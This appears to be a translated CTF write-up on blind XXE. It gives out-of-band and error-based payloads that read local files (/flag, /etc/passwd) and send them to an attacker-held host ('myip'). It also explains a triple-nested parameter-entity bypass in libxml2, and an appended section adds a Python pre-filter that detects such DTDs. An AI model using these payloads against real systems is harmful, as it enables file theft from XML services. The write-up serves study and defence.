0x01 Source
Blind XXE: a detailed analysis using a Google CTF challenge
0x02 Common payloads
I. Blind XXE (OOB)
1. External DTD
(1) Host the following DTD file on your own server:
xml.dtd
<!ENTITY % start "<!ENTITY % send SYSTEM 'http://myip:10001/?%file;'>">
%start;
Then send the request below (the file is read through PHP's php://filter wrapper and transmitted base64-encoded):
<?xml version="1.0"?>
<!DOCTYPE message [
<!ENTITY % remote SYSTEM "http://myip/xml.dtd">
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///flag">
%remote;
%send;
]>
<message>1234</message>
2. Local DTD file
Ubuntu ships /usr/share/yelp/dtd/docbookx.dtd, which the payload reuses:
<?xml version="1.0"?>
<!DOCTYPE message [
<!ENTITY % remote SYSTEM "/usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///flag">
<!ENTITY % ISOamso '
<!ENTITY % eval "<!ENTITY &#x25; send SYSTEM 'http://myip/?%file;'>">
%eval;
%send;
'>
%remote;
]>
<message>1234</message>
II. Error-based Blind XXE
The principle is the same as OOB. OOB sends the data out of band through an external URL; the error-based variant instead points the entity at a URL that cannot be resolved, so the file contents are leaked in the resulting error message.
The construction is therefore almost identical to the OOB one; only the URL differs, everything else is exactly the same.
1. Via a DTD file hosted on your own server
xml.dtd
<!ENTITY % start "<!ENTITY % send SYSTEM 'file:///hhhhhhh/%file;'>">
%start;
<?xml version="1.0"?>
<!DOCTYPE message [
<!ENTITY % remote SYSTEM "http://blog.szfszf.top/xml.dtd">
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///flag">
%remote;
%send;
]>
<message>1234</message>
2. Via a local DTD file
<?xml version="1.0"?>
<!DOCTYPE message [
<!ENTITY % remote SYSTEM "/usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///flag">
<!ENTITY % ISOamso '
<!ENTITY % eval "<!ENTITY &#x25; send SYSTEM 'file://hhhhhhhh/?%file;'>">
%eval;
%send;
'>
%remote;
]>
<message>1234</message>
0x03 Google CTF
First, capture the request with Burp Suite. The problem was found here: the web application is JSON-based, but it also accepts XML, so we convert the JSON body to XML and send the payload:
<?xml version="1.0"?>
<!DOCTYPE message [
<!ELEMENT message ANY>
<!ENTITY % remote SYSTEM "/usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % para1 SYSTEM "file:///flag">
<!ENTITY % ISOamso '
<!ENTITY % para2 "<!ENTITY &#x25; error SYSTEM 'file:///%para1;'>">
%para2;
'>
%remote;
]>
<message>10</message>
But I found that this challenge can also be solved without referencing an external DTD file, by nesting parameter entities directly:
<?xml version="1.0"?>
<!DOCTYPE message [
<!ELEMENT message ANY>
<!ENTITY % para1 SYSTEM "file:///flag">
<!ENTITY % para '
<!ENTITY % para2 "<!ENTITY &#x25; error SYSTEM 'file:///%para1;'>">
%para2;
'>
%para;
]>
<message>10</message>
0x04 An interesting discovery
I found that, although the W3C specification does not allow a parameter entity reference inside an entity declaration in the internal subset, many XML parsers do not perform this check well. Almost all XML parsers do detect the following two-level nesting:
<?xml version="1.0"?>
<!DOCTYPE message [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % start "<!ENTITY % send SYSTEM 'http://myip/?%file;'>">
%start;
%send;
]>
<message>10</message>
But a payload built from three nested parameter entities is not detected by some XML parsers: both combinations I tested, php7.2 + libxml2 2.9.4 and php5.4 + libxml2 2.9.1, could be exploited effectively:
<?xml version="1.0"?>
<!DOCTYPE message [
<!ELEMENT message ANY>
<!ENTITY % para1 SYSTEM "file:///flag">
<!ENTITY % para '
<!ENTITY % para2 "<!ENTITY &#x25; error SYSTEM 'file:///%para1;'>">
%para2;
'>
%para;
]>
<message>10</message>
This means that Blind XXE can be achieved without referencing an external DTD.
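As an added defensive example (not code from the post), here is a Python pre-filter that walks the DOCTYPE's entity declarations and descends into entity values, decoding character references one level per step, so the three-level nesting above is reported as a depth-3 parameter entity with an external identifier just like the two-level one is. The sample payloads are constructed from the post's, with the inner quotes of the three-level one written as &#x27; (my assumption) so that each literal is well-formed.

```python
import re
# Constructed samples adapted from the post: the two-level nesting most parsers
# reject, and the three-level one whose inner '%' is hidden as &#x25; (its inner
# quotes are written as &#x27;, an assumption here, so every literal is well-formed).
TWO_LEVEL = ('<!DOCTYPE message [\n<!ENTITY % file SYSTEM "file:///etc/passwd">\n'
             '<!ENTITY % start "<!ENTITY % send SYSTEM \'http://myip/?%file;\'>">\n'
             '%start;\n%send;\n]>\n<message>10</message>')
THREE_LEVEL = ('<!DOCTYPE message [\n<!ELEMENT message ANY>\n'
               '<!ENTITY % para1 SYSTEM "file:///flag">\n<!ENTITY % para \'\n'
               '<!ENTITY % para2 "<!ENTITY &#x25; error SYSTEM '
               '&#x27;file:///%para1;&#x27;>">\n%para2;\n\'>\n%para;\n]>\n<message>10</message>')

ENTITY_DECL = re.compile(r"<!ENTITY\s+(%\s+)?([^\s'\"]+)\s*")
CHARREF = re.compile(r"&#(x[0-9a-fA-F]+|[0-9]+);")
WS = re.compile(r"\s*")

def _expand_charrefs(text):  # decode numeric character refs once, as one expansion does
    return CHARREF.sub(lambda m: chr(int(m.group(1).lstrip("x"),
                                         16 if m.group(1)[0] == "x" else 10)), text)

def _read_literal(text, pos):  # (value, end) of the quoted literal starting at text[pos]
    end = text.index(text[pos], pos + 1)
    return text[pos + 1:end], end + 1

def scan_entity_decls(dtd, depth=1, findings=None):
    """Collect (depth, name, is_parameter, external_id) for every entity declaration,
    recursing into values that would declare further entities once expanded."""
    findings = [] if findings is None else findings
    pos = 0
    while (m := ENTITY_DECL.search(dtd, pos)):
        is_param, name, pos = m.group(1) is not None, m.group(2), m.end()
        external = value = None
        if dtd.startswith(("SYSTEM", "PUBLIC"), pos):
            keyword, pos = dtd[pos:pos + 6], WS.match(dtd, pos + 6).end()
            if keyword == "PUBLIC":          # skip the public id, keep the system id
                pos = WS.match(dtd, _read_literal(dtd, pos)[1]).end()
            external, pos = _read_literal(dtd, pos)
        else:
            value, pos = _read_literal(dtd, pos)
        findings.append((depth, name, is_param, external))
        if value is not None and "<!ENTITY" in _expand_charrefs(value):
            scan_entity_decls(_expand_charrefs(value), depth + 1, findings)
    return findings

def xxe_risk(xml):
    """Parameter or external entities at any DOCTYPE depth; malformed subsets are rejected too."""
    m = re.search(r"<!DOCTYPE\b[^\[>]*\[(.*?)\]\s*>", xml, re.S)
    try:
        return [f for f in scan_entity_decls(m.group(1) if m else "") if f[2] or f[3]]
    except (ValueError, IndexError):
        return [(0, "<malformed DTD>", True, None)]
```

This is a pre-filter for logging and rejecting such documents at the edge; the underlying fix is still to parse untrusted XML with DTD processing and external entity loading disabled in the parser itself.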